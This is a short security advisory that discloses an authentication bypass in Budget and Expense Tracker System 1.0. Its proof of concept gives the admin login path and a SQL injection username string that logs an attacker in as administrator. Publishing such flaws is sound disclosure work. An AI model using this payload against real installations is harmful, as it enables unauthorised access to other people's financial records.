Budget and Expense Tracker System 1.0 Authenticated Bypass

2021.09.20
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Budget and Expense Tracker System 1.0 - Authenticated Bypass # Exploit Author: Prunier Charles-Yves # Date: September 20, 2021 # Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip # Tested on: Linux, windows # Vendor: oretnom23 # Version: v1.0 # Exploit Description: Budget and Expense Tracker System 1.0, is prone to an Easy authentication bypass vulnerability on the application allowing the attacker to login with admin acount ----- PoC: Authentication Bypass ----- Administration Panel: http://localhost/expense_budget/admin/login.php Username: admin' or ''=' --


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top